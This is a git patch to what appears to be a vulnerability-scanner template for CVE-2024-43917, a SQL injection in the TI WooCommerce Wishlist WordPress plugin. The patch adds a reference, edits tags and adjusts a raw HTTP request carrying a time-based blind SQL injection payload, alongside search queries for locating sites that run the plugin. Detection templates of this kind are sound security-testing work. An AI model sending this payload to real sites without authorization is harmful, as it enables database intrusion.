From 4ac4ddcd234b355bf03c52510b6e57a84f5f9f16 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Sat, 5 Oct 2024 12:40:02 +0400
Subject: [PATCH] Update CVE-2024-43917.yaml

---
 http/cves/2024/CVE-2024-43917.yaml | 8 +++++---
 1 file changed, 5 insertions(+), 3 deletions(-)

diff --git a/http/cves/2024/CVE-2024-43917.yaml b/http/cves/2024/CVE-2024-43917.yaml
index 289f787543..22342161e7 100644
--- a/http/cves/2024/CVE-2024-43917.yaml
+++ b/http/cves/2024/CVE-2024-43917.yaml
@@ -9,6 +9,7 @@ info:
   reference:
     - https://patchstack.com/articles/unpatched-sql-injection-vulnerability-in-ti-woocommerce-wishlist-plugin/
     - https://patchstack.com/database/vulnerability/ti-woocommerce-wishlist/wordpress-ti-woocommerce-wishlist-plugin-2-8-2-sql-injection-vulnerability?_s_id=cve
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-43917
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -25,7 +26,7 @@ info:
     framework: wordpress
     fofa-query: body="/wp-content/plugins/ti-woocommerce-wishlist/"
     publicwww-query: "/wp-content/plugins/ti-woocommerce-wishlist/"
-  tags: cve,cve2024,wordpress,ti-woocommerce-wishlist,wp-plugin,sqli,intrusive
+  tags: cve,cve2024,wp,wordpress,ti-woocommerce-wishlist,wp-plugin,sqli
 
 flow: http(1) && http(2) && http(3) && http(4)
 
@@ -117,7 +118,8 @@ http:
 
   - raw:
       - |
-        GET /wp-json/wc/v3/wishlist/{{share_key}}/get_products?order=,(select*from(select(sleep(5)))a)--+- HTTP/1.1
+        @timeout: 20s
+        GET /wp-json/wc/v3/wishlist/{{share_key}}/get_products?order=,(select*from(select(sleep(6)))a)--+- HTTP/1.1
         Host: {{Hostname}}
         X-WP-Nonce: {{nonce}}
 
@@ -125,7 +127,7 @@ http:
     matchers:
       - type: dsl
         dsl:
-          - "duration>=5"
+          - "duration>=6"
           - "contains(content_type, 'application/json')"
           - "contains(body, 'product_id')"
         condition: and